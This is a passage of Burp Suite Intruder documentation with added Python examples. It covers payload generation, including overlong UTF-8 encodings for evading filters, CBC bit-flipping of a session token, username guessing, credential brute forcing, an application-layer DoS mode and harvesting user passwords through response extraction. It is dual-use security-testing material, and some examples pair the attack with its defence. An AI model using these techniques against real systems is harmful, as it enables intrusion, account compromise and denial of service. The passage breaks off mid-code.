 illegal hex - This option is always available. When the list of illegally-encoded items has been generated using overlong encoding and illegal variants of continuation bytes (if selected), it is possible to modify the hexadecimal encoding of the resultant byte sequences to confuse certain pattern-matching controls. Hex encoding uses the characters A - F to represent the decimal values 10 - 15. However, some hex decoders interpret G as decimal 16, H as decimal 17, etc. So 0x1G may be interpreted as decimal 32. In addition, if illegal hex characters are used in the first position of a two digit hex code, then the resultant decoding overflows the size of a single byte, and in this case some hex decoders only use the 8 least significant bits of the resulting number. So 0xG1 may be decoded as decimal 257, which is then interpreted as decimal 1. Each legal two digit hex code has between 4 and 6 corresponding illegal hex representations which are interpreted as that same hex code if decoded as described above. If the "illegal hex" option is selected, then the illegal Unicode payload source will generate all possible illegal hex encodings of each byte in the list of illegal-encoded items.
 max permutations - This option is available if a maximum overlong UTF-8 length of 2 bytes or more is selected, and "illegal hex" is selected. If the "max permutations" option is not selected, then the illegal Unicode payload source will work through each byte in turn when generating illegal hex; for each byte, between 4 and 6 illegal hex encodings will be generated and the other bytes will be unchanged. If the "max permutations" option is selected, however, then the illegal Unicode payload source will generate all permutations of illegal hex for all bytes - i.e. more than one byte will be modified simultaneously. This feature may be useful in attempting to circumvent advanced pattern-matching controls on the target system.
 add % prefix - If this option is selected, then the % character will be inserted before each two digit hex code in the payloads generated.
 lower case hex - This option determines whether lower or upper case alphabet characters will be used in hex codes.
 max encodings - This option places a ceiling on the number of illegal encodings that will be generated. This can be useful if large overlong encodings are being used and / or max permutations have been selected, as these options may generate huge numbers of illegal encodings.

When the attack is executed, this payload source iterates through the list of preset items, and for each preset item replaces all instances of the specified character with each item in turn in the set of illegal encodings.
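The overlong encodings and illegal continuation-byte variants described above, as an added example written for this chapter (not Burp's code), applied to the / character from the path-traversal case in the text. The point for anyone building or reviewing an input filter is the pairing at the end: Python's built-in UTF-8 codec, standing in for any strict decoder, rejects every one of these byte sequences, while a naive decoder that only counts leading bits and masks payload bits (written here for contrast, and the pattern to avoid) turns each of them back into a plain slash after the pattern match has already run. The `encodings_of` helper is a constructed test-vector set for checking a decoder of your own.

```python
# Added example; not Burp's code. Generates the overlong UTF-8 forms and the
# illegal continuation-byte variants described in the text for one character,
# and contrasts a strict decoder with a naive one.


def overlong_utf8(codepoint, nbytes):
    """Encode codepoint in exactly nbytes bytes of UTF-8 (1 to 6, following the
    original UTF-8 definition). nbytes=1 is the only legal form for ASCII;
    2 to 6 bytes are overlong encodings."""
    if not 1 <= nbytes <= 6:
        raise ValueError("UTF-8 sequences are 1 to 6 bytes long")
    if nbytes == 1:
        if codepoint > 0x7F:
            raise ValueError("a single byte only encodes ASCII")
        return bytes([codepoint])
    if codepoint >= 1 << (5 * nbytes + 1):            # payload bits available
        raise ValueError("codepoint does not fit in %d bytes" % nbytes)
    continuation, value = [], codepoint
    for _ in range(nbytes - 1):                       # 6 payload bits per byte
        continuation.append(0x80 | (value & 0x3F))
        value >>= 6
    lead = ((0xFF << (8 - nbytes)) & 0xFF) | value    # nbytes leading 1 bits
    return bytes([lead] + continuation[::-1])


def illegal_continuation_variants(seq):
    """For each continuation byte of seq, yield the three variants whose 10xxxxxx
    prefix is replaced by 00, 01 and 11 (one byte modified at a time, i.e. the
    behaviour without "max permutations")."""
    for i in range(1, len(seq)):
        low6 = seq[i] & 0x3F
        for prefix in (0x00, 0x40, 0xC0):
            yield seq[:i] + bytes([prefix | low6]) + seq[i + 1:]


def strict_decode(seq):
    """The hardened form: decode with a strict codec and refuse anything else.
    Returns the text, or None if the bytes are not well-formed UTF-8."""
    try:
        return seq.decode("utf-8")
    except UnicodeDecodeError:
        return None


def naive_decode(seq):
    """The weak form, for contrast: count leading 1 bits, mask payload bits and
    never check for overlong forms or continuation prefixes."""
    out, i = [], 0
    while i < len(seq):
        b = seq[i]
        n = 0
        while n < 8 and (b << n) & 0x80:              # count leading 1 bits
            n += 1
        n = max(n, 1)                                 # no leading 1 bit: ASCII
        value = b if n == 1 else b & (0xFF >> (n + 1))
        for k in range(1, n):
            if i + k >= len(seq):
                raise ValueError("truncated sequence")
            value = (value << 6) | (seq[i + k] & 0x3F)   # prefix bits ignored
        out.append(chr(value))
        i += n
    return "".join(out)


def encodings_of(codepoint, max_len=6):
    """All overlong forms of codepoint up to max_len bytes plus their illegal
    continuation variants: a constructed test-vector set for a decoder."""
    vectors = []
    for n in range(2, max_len + 1):
        base = overlong_utf8(codepoint, n)
        vectors.append(base)
        vectors.extend(illegal_continuation_variants(base))
    return vectors


if __name__ == "__main__":
    for v in encodings_of(ord("/"), 3):
        print(v.hex(), "strict:", strict_decode(v), "naive:", repr(naive_decode(v)))
```

The 2-byte form of / comes out as C0 AF, the 3-byte form as E0 80 AF, and so on; a filter that matches on the literal "../" after a naive decode, or before any decode at all, never sees them. Decoding strictly once at the boundary, and rejecting rather than repairing malformed input, removes the whole family of variants at once.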

Character blocks

This payload source generates character blocks of specific sizes using a given input string. It can be useful in detecting buffer overflow and other boundary condition vulnerabilities in software running in a native (unmanaged) context: The "string" field specifies the input string from which the character blocks will be generated. The "min" and "max" fields specify the lengths of the smallest and largest character blocks that may be generated. The "step" field specifies the increment in the length of each character block.

Numbers

This payload source generates numbers, either sequentially or at random, in a specified format:

The "from" and "to" fields specify the smallest and largest number that may be generated. If "sequential" is selected, the numbers start at the value in the "from" field, and are incremented by the value in the "step" field. If "random" is selected, the "how many" field specifies the number of numbers to be generated. Numbers can be generated in decimal or hexadecimal form. If hexadecimal is selected, then the "from", "to" and "step" fields must contain hexadecimal integers; otherwise they may contain decimal integers or fractions. The controls on the right-hand side specify the number format which will be used.

Dates

This payload source generates dates between a specified range, at a specified interval, in a specified format. This payload source may be useful during data mining (e.g. trawling an order book for entries placed on different days) or brute forcing (e.g. guessing the date of birth component of a user's credentials):

The dates generated start with the date specified in the "from" controls, and are incremented by the interval specified in the "step" controls, up to or including the date specified in the "to" controls. Several predefined date formats can be selected in the "format" pull-down menu, or a custom date format can be entered in the text field. The following examples illustrate the codes that can be used to specify custom date formats:

Code         Example output (for Saturday 7 June 2003)
E            Sat
EEEE         Saturday
d            7
dd           07
M            6
MM           06
MMM          Jun
MMMM         June
yy           03
yyyy         2003
/ . : etc.   / . : (non-letter characters are copied literally as separators)
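The table above lists the field codes but not how a range of dates is turned into payloads. The following Python script is an added example (not Burp's code) that renders dates with those same codes and steps from a "from" date to a "to" date. It assumes the codes behave like Java's SimpleDateFormat, which is what the sample output in the table corresponds to, and supports only the ten codes shown; weekday and month names are spelled out explicitly so the result does not depend on the process locale.

```python
from datetime import date, timedelta
import re

# Explicit English names so output does not depend on the process locale.
_WEEKDAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday",
             "Saturday", "Sunday"]
_MONTHS = ["January", "February", "March", "April", "May", "June", "July",
           "August", "September", "October", "November", "December"]

# Field codes from the table above.  Assumption: these ten are the only codes
# supported here; any other letter run is rejected rather than guessed at.
_FIELDS = {
    "E":    lambda d: _WEEKDAYS[d.weekday()][:3],   # Sat
    "EEEE": lambda d: _WEEKDAYS[d.weekday()],       # Saturday
    "d":    lambda d: str(d.day),                   # 7
    "dd":   lambda d: "%02d" % d.day,               # 07
    "M":    lambda d: str(d.month),                 # 6
    "MM":   lambda d: "%02d" % d.month,             # 06
    "MMM":  lambda d: _MONTHS[d.month - 1][:3],     # Jun
    "MMMM": lambda d: _MONTHS[d.month - 1],         # June
    "yy":   lambda d: "%02d" % (d.year % 100),      # 03
    "yyyy": lambda d: "%04d" % d.year,              # 2003
}

# A pattern is a sequence of runs of one repeated letter (field codes) and
# runs of non-letters (literal separators such as "/", "." or ":").
_TOKEN = re.compile(r"([A-Za-z])\1*|[^A-Za-z]+")


def _as_date(d):
    """Accept either a date object or an ISO "YYYY-MM-DD" string."""
    return date.fromisoformat(d) if isinstance(d, str) else d


def format_date(d, pattern):
    """Render date d with the Java-style pattern codes listed above."""
    d = _as_date(d)
    out = []
    for m in _TOKEN.finditer(pattern):
        tok = m.group(0)
        if tok[0].isalpha():
            if tok not in _FIELDS:
                raise ValueError("unsupported date code: %r" % tok)
            out.append(_FIELDS[tok](d))
        else:
            out.append(tok)
    return "".join(out)


def date_payloads(start, end, step_days, pattern):
    """Yield formatted dates from start up to and including end, step_days
    apart, mirroring the "from", "to" and "step" controls."""
    if step_days <= 0:
        raise ValueError("step must be a positive number of days")
    d, end = _as_date(start), _as_date(end)
    while d <= end:
        yield format_date(d, pattern)
        d += timedelta(days=step_days)


if __name__ == "__main__":
    for p in date_payloads("2003-06-07", "2003-06-21", 7, "EEEE dd/MM/yyyy"):
        print(p)
```

Rejecting unknown codes instead of passing them through matters in practice: a silently mis-rendered pattern produces a payload set that never matches the application's own date format, and the attack reports nothing while looking as if it ran.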

Brute forcer

This payload source generates a set of payloads of specified lengths which contain all possible permutations of a specified character set.

Null payloads

This payload source generates "null" payloads - i.e. zero-length strings. It can generate a specified number of null payloads, or continue indefinitely.

This payload source is useful when an attack requires the same request to be made repeatedly, without any modification to the basic template. To achieve this, a single pair of position markers should be placed together anywhere in the request template (see Positions tab). This can be used for a variety of attacks, for example harvesting cookies for sequencing analysis, application-layer denial-of-service attacks where requests are repeatedly sent which initiate high-workload tasks on the server, or keeping alive a session token which is being used in other intermittent tests.

Char frobber

This payload source operates on the existing base value of each payload position, or on a specified string. It cycles through the base string one character at a time, incrementing the ASCII code of that character by one.

This payload source is useful when testing which parameter values, or parts of values, have an effect on the application's response. In particular, it can be useful when testing which parts of a complex session token are actually being used to track session state. If modifying the value of an individual character within the session token still causes your request to be processed within your session, then it is likely that this character in the token is not actually being used to track your session.

Bit flipper

This payload source operates on the existing base value of each payload position, or on a specified string. It cycles through the base string one character at a time, flipping each (specified) bit in turn. You can configure the bit flipper either to operate on the literal base value, or to treat the base value as an ASCII hex string. For example, if the base value is "ab" then operating on the literal string and flipping all bits will result in the following payloads:

`b cb eb ib qb Ab !b áb ac a` af aj ar aB a" aâ

Whereas treating "ab" as an ASCII hex string and flipping all bits will result in the following payloads:

aa a9 af a3 bb 8b eb 2b
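The two payload lists above can be reproduced exactly with a few lines of Python. The script below is an added example, not Burp's implementation: it generates the char frobber and bit flipper payloads (both the literal and the ASCII-hex interpretation of the base value) and then uses the frobber for the session-token check described earlier, reporting which character positions the server does not appear to examine. The `still_accepted` oracle is a stand-in for resending the request and inspecting the response; the token and the oracle in the usage section are constructed.

```python
def char_frobber(base):
    """Yield one payload per character position: that character's code
    point incremented by one, everything else unchanged ("ab" -> "bb", "ac")."""
    for i, ch in enumerate(base):
        yield base[:i] + chr(ord(ch) + 1) + base[i + 1:]


def bit_flipper(base, bits=range(8), as_hex=False):
    """Yield payloads with exactly one bit flipped at a time, lowest bit
    first, position by position.

    as_hex=False: base is the literal string; each character is one byte
    (latin-1) and the result is decoded the same way, so "ab" gives
    "`b", "cb", "eb", ... "áb", then "ac", "a`", ... "aâ".
    as_hex=True: base is an ASCII-hex string, so "ab" is the single byte
    0xAB and the payloads are its hex spellings "aa", "a9", ... "2b".
    """
    data = bytes.fromhex(base) if as_hex else base.encode("latin-1")
    for i in range(len(data)):
        for bit in bits:
            flipped = bytearray(data)
            flipped[i] ^= 1 << bit
            yield flipped.hex() if as_hex else flipped.decode("latin-1")


def positions_not_checked(token, still_accepted):
    """Apply the char frobber to a session token and return the indices whose
    modification the server still accepts, i.e. characters that apparently
    are not used to look up the session.  still_accepted is a caller-supplied
    oracle; in a real test it resends the request and checks the response."""
    return [i for i, candidate in enumerate(char_frobber(token))
            if still_accepted(candidate)]


if __name__ == "__main__":
    print(list(bit_flipper("ab")))
    print(list(bit_flipper("ab", as_hex=True)))
    # Constructed oracle: a server that only compares the first four characters
    # of the (constructed) token "k7Qp3f9z".
    oracle = lambda t: t[:4] == "k7Qp"
    print(positions_not_checked("k7Qp3f9z", oracle))   # [4, 5, 6, 7]
```

The latin-1 round trip is what makes the literal mode match the list above: flipping the top bit of "a" (0x61) gives 0xE1, which latin-1 renders as "á". Sending such payloads over HTTP requires the final URL-encoding step described under Payload processing.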

This payload source can be useful in similar situations to the char frobber but where you need finer-grained control. For example, if session tokens or other parameter values contain meaningful data encrypted with a block cipher in CBC mode, it may be possible to change parts of the decrypted data systematically by modifying bits within the preceding cipher block. In this situation, you can use the bit flipper payload source to determine the effects of modifying individual bits within the encrypted value, and understand whether the application may be vulnerable.
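To make the CBC point above concrete, here is an added Python demonstration (not Burp's code and not a real cipher) of why a token encrypted in CBC mode without an integrity check is malleable, and of the check that stops it. The block cipher is a deliberately weak toy (keyed byte substitution plus a rotation), used only to avoid a third-party AES dependency; the malleability comes from the CBC chaining equation P(n) = D(C(n)) xor C(n-1), so it holds for AES-CBC in the same way. Keys, IV and the plaintext "user=bob;admin=0" are constructed values.

```python
import hashlib
import hmac
import random

BLOCK = 8  # toy block size in bytes


class ToyBlockCipher:
    """Deliberately weak block cipher (keyed byte substitution plus a
    one-byte rotation).  It exists only so CBC chaining can be shown without
    an AES library; do not use it for anything but this demonstration."""

    def __init__(self, key):
        seed = int.from_bytes(hashlib.sha256(key).digest(), "big")
        self.box = list(range(256))
        random.Random(seed).shuffle(self.box)
        self.inv = [0] * 256
        for i, v in enumerate(self.box):
            self.inv[v] = i

    def encrypt_block(self, block):
        s = bytes(self.box[x] for x in block)
        return s[1:] + s[:1]

    def decrypt_block(self, block):
        s = block[-1:] + block[:-1]
        return bytes(self.inv[x] for x in s)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_encrypt(cipher, iv, plaintext):
    """Plaintext must be a whole number of blocks (padding omitted for brevity)."""
    assert len(plaintext) % BLOCK == 0
    out, prev = [iv], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = cipher.encrypt_block(_xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)          # IV || C1 || C2 || ...


def cbc_decrypt(cipher, data):
    prev, out = data[:BLOCK], []
    for i in range(BLOCK, len(data), BLOCK):
        c = data[i:i + BLOCK]
        out.append(_xor(cipher.decrypt_block(c), prev))  # P(n) = D(C(n)) xor C(n-1)
        prev = c
    return b"".join(out)


def flip_bit(data, index, bit):
    out = bytearray(data)
    out[index] ^= 1 << bit
    return bytes(out)


# Encrypt-then-MAC: the tag covers IV and ciphertext, so a flipped bit is
# rejected before any decryption is attempted.
def seal(cipher, mac_key, iv, plaintext):
    ct = cbc_encrypt(cipher, iv, plaintext)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()


def open_sealed(cipher, mac_key, blob):
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest()):
        raise ValueError("integrity check failed")
    return cbc_decrypt(cipher, ct)


# Constructed demo values.
KEY, MAC_KEY = b"constructed-enc-key", b"constructed-mac-key"
IV = bytes(range(BLOCK))                 # fixed only for reproducibility
PLAINTEXT = b"user=bob;admin=0"          # block 1 = "user=bob", block 2 = ";admin=0"


def tamper_unauthenticated():
    """Flip bit 0 of the last byte of ciphertext block 1 (bytes 8..15; the IV
    occupies 0..7).  The same bit flips in plaintext block 2, turning
    "admin=0" into "admin=1", while block 1 decrypts to garbage."""
    cipher = ToyBlockCipher(KEY)
    ct = cbc_encrypt(cipher, IV, PLAINTEXT)
    return cbc_decrypt(cipher, flip_bit(ct, BLOCK + 7, 0))


def tamper_authenticated():
    """The same modification against an encrypt-then-MAC token is rejected."""
    cipher = ToyBlockCipher(KEY)
    blob = seal(cipher, MAC_KEY, IV, PLAINTEXT)
    try:
        open_sealed(cipher, MAC_KEY, flip_bit(blob, BLOCK + 7, 0))
        return "accepted"
    except ValueError:
        return "rejected"
```

The garbled first block is the tell-tale sign a reviewer should look for in application logs: a token that decrypts to nonsense in one block and valid-looking data in the next has almost certainly been modified in transit. An application that only inspects the field it needs (here "admin") never sees that signal, which is why the MAC has to be verified before the plaintext is parsed at all.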

Username generator

This payload source takes human names as input, and generates usernames using various common schemes. For example, supplying the name "peter weiner" results in up to 115 possible usernames, as follows: peterweiner peter.weiner weinerpeter weiner.peter peter weiner peterw peter.w wpeter w.peter pweiner p.weiner weinerp weiner.p etc...

This payload source can be useful if you are targeting a particular human user, and you do not know the username or email address scheme in use within an application.

Payload processing

For each payload set, in addition to the "source" of payloads to use, it is possible to define various additional processing to be performed on each payload. This processing is carried out after all manipulation performed by the selected payload source. The defined rules are executed in sequence, and can be toggled on and off to help debug any problems with the configuration. The following types of rule are available:

- add prefix
- add suffix
- match/replace
- substring (from a specified offset up to a specified length)
- reverse substring (as substring, but indexed from the end of the payload)
- modify case (same options as for the case substitution payload source)
- encode (as URL, HTML, Base64, ASCII hex and constructed strings for various platforms)
- decode (as URL, HTML, Base64 and ASCII hex)
- hash
- addition of raw payload (this can be useful if you need to include the same payload in both raw and hashed form)

Finally, you can configure which characters within the resulting payload should be URL- encoded for safe transmission within HTTP requests:

It is recommended to use this setting for final URL-encoding, rather than a payload processing rule, because the payload grep option can be used to check responses for echoed payloads before the final URL-encoding is applied.

Options tab

This tab contains various configuration options which control the behaviour of individual attacks.

These options are used to configure the manipulation of HTTP headers in generated requests.

If the "update Content-Length header" box is checked, then Burp Intruder will add or update the Content-Length HTTP header in each request, with the correct value for the length of the HTTP body of that particular request. This feature is usually essential for attacks which insert variable-length payloads into the body of the template HTTP request. The HTTP specification, and most web servers, require the correct value for the length of the HTTP body to be specified using the Content-Length header. If the correct value is not specified, then the target server may return an error, may respond to an incomplete request, or may wait indefinitely for further data to be received in the request.

If "set Connection: close" is checked, then Burp Intruder will add or update the Connection HTTP header to request that the connection is closed following each individual request. In some cases (when the server does not itself return a valid Content-Length or Transfer-Encoding header), this option may allow attacks to be performed more quickly.
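The payload processing rules, the final URL-encoding step and the Content-Length handling just described fit together into one pipeline: process the payload, encode only the characters that are unsafe in the request, place it in the template, and compute Content-Length from the encoded body. The Python below is an added example of that pipeline, not Burp's own code. Rule names, the tuple form of each rule, the marker character used in the template and the set of characters that get URL-encoded are this example's choices; the meaning given to "reverse substring" (offset counted back from the end) is an assumption.

```python
import base64
import hashlib
import html
import urllib.parse


def _encode(s, scheme):
    if scheme == "url":
        return urllib.parse.quote(s, safe="")
    if scheme == "html":
        return html.escape(s, quote=True)
    if scheme == "base64":
        return base64.b64encode(s.encode("utf-8")).decode("ascii")
    if scheme == "hex":
        return s.encode("utf-8").hex()
    raise ValueError("unknown encoding: %s" % scheme)


def _decode(s, scheme):
    if scheme == "url":
        return urllib.parse.unquote(s)
    if scheme == "html":
        return html.unescape(s)
    if scheme == "base64":
        return base64.b64decode(s).decode("utf-8")
    if scheme == "hex":
        return bytes.fromhex(s).decode("utf-8")
    raise ValueError("unknown encoding: %s" % scheme)


def apply_rules(payload, rules):
    """Run the rule list in order on one payload.  Each rule is a tuple:
    ("prefix", s), ("suffix", s), ("replace", old, new), ("substring", off, n),
    ("rsubstring", off, n), ("case", "upper"|"lower"|"title"|"swapcase"),
    ("encode", scheme), ("decode", scheme), ("hash", algo), ("add_raw",)."""
    raw = payload
    for rule in rules:
        kind, args = rule[0], rule[1:]
        if kind == "prefix":
            payload = args[0] + payload
        elif kind == "suffix":
            payload = payload + args[0]
        elif kind == "replace":
            payload = payload.replace(args[0], args[1])
        elif kind == "substring":
            off, n = args
            payload = payload[off:off + n]
        elif kind == "rsubstring":            # assumed: offset from the end
            off, n = args
            end = len(payload) - off
            payload = payload[max(0, end - n):end]
        elif kind == "case":
            if args[0] not in ("upper", "lower", "title", "swapcase"):
                raise ValueError("unknown case option: %s" % args[0])
            payload = getattr(payload, args[0])()
        elif kind == "encode":
            payload = _encode(payload, args[0])
        elif kind == "decode":
            payload = _decode(payload, args[0])
        elif kind == "hash":
            payload = hashlib.new(args[0], payload.encode("utf-8")).hexdigest()
        elif kind == "add_raw":
            payload = payload + raw           # e.g. hashed form followed by raw form
        else:
            raise ValueError("unknown rule: %s" % kind)
    return payload


def final_url_encode(payload, chars):
    """Percent-encode only the listed characters.  Run this last, so the
    payload grep can still search responses for the pre-encoding form."""
    return "".join("%%%02X" % ord(c) if c in chars else c for c in payload)


def build_request(method, path, host, body, close_connection=True):
    """Assemble an HTTP/1.1 request.  Content-Length is the byte length of
    the UTF-8 body, not its character count; "Connection: close" asks the
    server to end the connection after this response."""
    body_bytes = body.encode("utf-8")
    lines = ["%s %s HTTP/1.1" % (method, path), "Host: " + host,
             "Content-Type: application/x-www-form-urlencoded",
             "Content-Length: %d" % len(body_bytes)]
    if close_connection:
        lines.append("Connection: close")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body_bytes


def intruder_request(payload, rules, template="user=admin&pass=\u00a7"):
    """Process one payload, drop it into the template at the \u00a7 marker and
    return (processed payload, request bytes).  The first value is what to
    look for in the response; the request carries the URL-encoded form.
    The template and the encoded character set are constructed for this example."""
    processed = apply_rules(payload, rules)
    body = template.replace("\u00a7", final_url_encode(processed, "&=+;<>\"' "))
    return processed, build_request("POST", "/login", "app.example", body)
```

Two details are worth noticing when reproducing Intruder's behaviour by hand. Content-Length must count bytes: a body containing "é" is one character longer than its ASCII neighbour but two bytes longer, and a miscounted header produces exactly the hangs and truncated reads the text describes. And the processed (pre-encoding) payload is the value to keep for the payload grep, since that is the form in which a vulnerable application echoes it back.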

Note: Earlier versions of Burp Intruder contained options here to add a cookie header to the request, based on the response to a different request. These configurations have now been removed, and you should use the suite-wide session handling support instead.

The concurrent threads setting determines whether the attack will launch requests synchronously in a single thread, or concurrently using multiple threads. Using multiple threads can rapidly accelerate a large attack, where the main time factor is the latency between issuing each request and receiving a response. It can be used to test for concurrent processing vulnerabilities in applications. And it can be used to increase the effectiveness of application-layer denial-of-service attacks.

The retry settings determine how many times Burp will repeat a request if a network failure occurs (e.g. the connection is refused or times out), and how long it will wait between retries.

The throttle settings are used to configure any time delay required between requests. A fixed delay may be desirable as a stealth precaution, to avoid a performance impact, to preserve bandwidth or processing power for other activities, or to perform a required action periodically, such as keeping alive a session token which is being used in other intermittent tests. A variable delay can be useful to automate the detection of session timeout values.

The start settings determine whether the attack will begin immediately when launched, or will begin after a specified delay, or will wait until the "resume" command is selected (see Results view). This function can be useful if an attack is being configured which will be executed at some future point, or saved for future use.

The storage settings determine whether the attack will save the contents of individual requests and responses. Saving requests and responses consumes disk space in your temporary directory, but enables you to view these in full during an attack, repeat individual requests if necessary, and send items to other Burp tools.

If the "make unmodified baseline request" option is selected, then in addition to the configured attack requests, Burp will issue the template request with all payload positions set to their base values. This request will show as item #0 in the results table.

If the "DoS mode" option is selected, then the attack will issue requests as normal but will not wait to process any responses received from the server. As soon as each request is issued, the TCP connection is closed. This function can be used to perform application-layer denial-of-service attacks against vulnerable applications, by repeatedly sending requests which initiate high-workload tasks on the server.

If the "store full payloads" option is selected, Burp will store the full payload values for each result. This option consumes additional memory but may be required if you want to perform certain actions at runtime, such as modifying payload grep settings, or reissuing requests with a modified request template.

The "grep" settings are used to configure various pattern-matching based tests to be performed at runtime on server responses. There are three types of tests:

match grep - This is used to check each server response for specified expressions, either simple pattern matches or Perl-like regular expressions. For each specified expression, the attack will include a column in the results table indicating whether a match was found. This basic feature has a wide variety of uses, for example: in password guessing attacks, scanning for phrases such as "password incorrect" or "login successful"; in testing for SQL injection vulnerabilities, scanning for messages containing "ODBC", "error", etc.

If regular expressions are used as matching expressions, then these may contain newline characters.

extract grep - This is used to check each server response for specified expressions, and if present to extract the text immediately following the matched expression (up to a specified delimiter or maximum length). For each specified expression, the attack will include a column in the results table containing the text extracted from each server response. This feature can be used for data mining, where access has been gained to a web page containing useful information, and an automated means of extracting this information is required. For example, if you have gained access to a user administration page, which is used to access or update the account information of the user whose ID is specified in the URL query string, then you can execute an attack which iterates through user IDs and extracts the username and password of each user.

If the same matching expression is added multiple times in succession, then each server response will be searched for multiple occurrences of that expression, and the text immediately following each occurrence will be captured. This can be useful, e.g. when an HTML table contains useful information but there are no unique prefixes with which to automatically pick out each item.

payload grep - This is used to check each server response for the payload string(s) which were used in the corresponding request. This feature is useful in detecting cross-site scripting and other response injection vulnerabilities, which can arise when user input is dynamically inserted into the application's response.

If the "match against pre-encoded payloads" option is selected, then responses are searched for the raw form of each payload string before any encoding was applied (see Payload processing). Setting this option is normally desirable - for example, if you use XSS test payloads containing typographical characters, these will typically need to be URL-encoded in the payload processing options, but will appear in responses in their pre-encoded form if the application is vulnerable.

The redirect settings control whether Burp Intruder will follow HTTP redirects (i.e. those with a 3xx status code and a Location header containing a new URL) when performing an attack. If configured to follow redirects, then when a redirect is received Intruder will request the redirection URL (following up to 10 redirections if necessary), and record the details of the subsequent response within the results. A column in the results table will indicate whether a redirect was followed for each individual result. You can configure whether to follow only on-site (i.e. same protocol, host and port) redirects, only in-scope (defined in Target tab) redirects, or to follow all redirects. The option to follow redirects is often useful when an application returns a 3xx response to various kinds of input, with the more interesting features of the application's processing of your request being returned when the redirection target is requested. For example, when fuzzing for common vulnerabilities, the application may frequently return a redirect to an error page - this page may contain useful information about the nature of the error which can be used to diagnose bugs like SQL injection.

Note that in some situations it may be necessary to use only a single-threaded attack when redirects are being followed, for example if the application stores within the session the information which is returned by the next request to the redirection target. Note also that automatically following redirects may sometimes cause problems for your attack - for example, if the application responds to some malicious requests with a redirection to the logout page, then following redirects may result in your session being terminated when it would not otherwise do so.

If the "process cookies in redirects" option is selected, then any cookies set in the 3xx response will be resubmitted when the redirection target is followed. For example, this option may be necessary if you are attempting to brute force a login challenge which always returns a redirection to a page indicating the login result, and a new session is created in response to each login attempt.

Launching an attack

To create a new attack, use the control panel tabs to set the required configuration, then select "start attack" from the Intruder menu. To load a saved attack, select "open saved attack" from the Intruder menu, and choose the required file.

When a new attack is executed, various validation checks are performed on the specified configuration. This includes verifying that payload position(s) and payload set(s) are correctly defined, that timing and grep settings are valid, etc. Some failures generate errors which prevent the attack from executing; others generate warnings which may be ignored.

Each attack opens in a separate window. This window displays the results of the attack as they are generated, enables you to modify the attack configuration in real time, and also contains a number of options for controlling the attack, and saving the results, server responses and the attack itself.

Note: When modifying the live configuration of a running attack, you should proceed with caution and consider pausing the attack before making changes.

Results tab

The following is an example of the results view for an attack performing basic content enumeration on a target website:

This attack uses the sniper attack type (see Positions tab) to make requests for a series of common names of web directories. For this attack type, the results view displays by default the number of each request, the payload position used (if more than one is configured), the payload inserted, the HTTP status code received from the server, whether or not an error or timeout occurred, and the length of the server's response. Additional results columns that can be displayed include the "received response" and "finished response" timers for each request, and any cookies received. Various configuration options, such as the grep functions, will cause additional columns to appear in the results view. Columns can be hidden or revealed using the "view" menu. The set of results can be sorted according to the contents of any results column by clicking on the relevant header (and reverse-sorted by shift-clicking the header). You can copy the contents of a column by ctrl-clicking the header [Pro version].

A key part of effectively interpreting the results of an attack is locating interesting or successful server responses, and identifying the requests which generated these. Interesting responses can usually be differentiated through at least one of the following:

- a different HTTP status code;
- a different length of response;
- the presence or absence of certain expressions;
- the occurrence of an error or timeout; or
- the time taken to receive or complete the response.

For example, in a content discovery exercise, requests for existing resources might return a "200 OK" response of varying lengths, while requests for nonexistent resources might return a "404 Not found" response, or a "200 OK" response containing a fixed-length custom error page. Or in a password guessing attack, failed login attempts might generate a "200 OK" response containing the keywords "login failed", while a successful login might generate a "302 Object moved" response, or a "200 OK" response of a different length containing the word "welcome".

Burp Intruder can provide assistance in identifying any of the above differentiators. The grep functions (see Grep tab) can be used to mark responses containing known keywords, or to extract interesting information from key parts of the page. In the results view, results can be sorted by clicking a column header, or reverse sorted by shift-clicking the header. In the above example, the HTTP status code is the main differentiator of interesting results, and the results have been sorted to pinpoint these.
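The three grep tests described under the Options tab and the differentiators listed just above are simple enough to implement directly, which also makes clear what each column in the results view actually measures. The Python below is an added example (not Burp's code): it implements match grep, extract grep (returning every occurrence, which is what adding the same expression repeatedly achieves in Burp) and payload grep with the pre-encoded match, then builds the results-table columns over a constructed content-discovery run and flags the rows whose status or length deviates from the most common value. The sample responses and the user-administration page are constructed for the example.

```python
import re
from collections import Counter


def match_grep(body, expressions, regex=False):
    """One boolean column per expression (plain substring or regex; regexes
    may span lines, hence re.S)."""
    return {e: bool(re.search(e, body, re.S)) if regex else (e in body)
            for e in expressions}


def extract_grep(body, start_expr, delimiter=None, max_len=None):
    """Text following each occurrence of start_expr, up to the delimiter or
    max_len.  Burp captures one occurrence per copy of the expression; here
    every occurrence is returned in a list."""
    found, pos = [], 0
    while True:
        i = body.find(start_expr, pos)
        if i < 0:
            return found
        start = i + len(start_expr)
        end = len(body)
        if delimiter is not None:
            j = body.find(delimiter, start)
            if j >= 0:
                end = j
        if max_len is not None:
            end = min(end, start + max_len)
        found.append(body[start:end])
        pos = start


def payload_grep(body, raw_payload, sent_payload, match_pre_encoded=True):
    """Was the payload echoed?  With match_pre_encoded the raw (pre-encoding)
    form is searched for, which is how a reflected payload usually reappears;
    an application that entity-encodes the echo will not match."""
    return (raw_payload if match_pre_encoded else sent_payload) in body


def analyse(results, keywords=()):
    """Build the results-table columns (status, length, error, time, keyword
    matches) and flag rows whose status or length differs from the most
    common value, or which errored: the usual differentiators listed above."""
    rows = [{
        "payload": r["payload"], "status": r["status"], "length": len(r["body"]),
        "error": r.get("error", False), "time_ms": r["time_ms"],
        "matches": match_grep(r["body"], keywords),
    } for r in results]
    usual_status = Counter(r["status"] for r in rows).most_common(1)[0][0]
    usual_length = Counter(r["length"] for r in rows).most_common(1)[0][0]
    for r in rows:
        r["interesting"] = (r["status"] != usual_status
                            or r["length"] != usual_length or r["error"])
    return rows


def interesting_payloads(results, keywords=()):
    """Payloads whose response stands out, in request order."""
    return [r["payload"] for r in analyse(results, keywords) if r["interesting"]]


# Constructed sample: a content-discovery run over five directory names.
NOT_FOUND = "<html><body><h1>404 Not found</h1></body></html>"
SAMPLE_RESULTS = [
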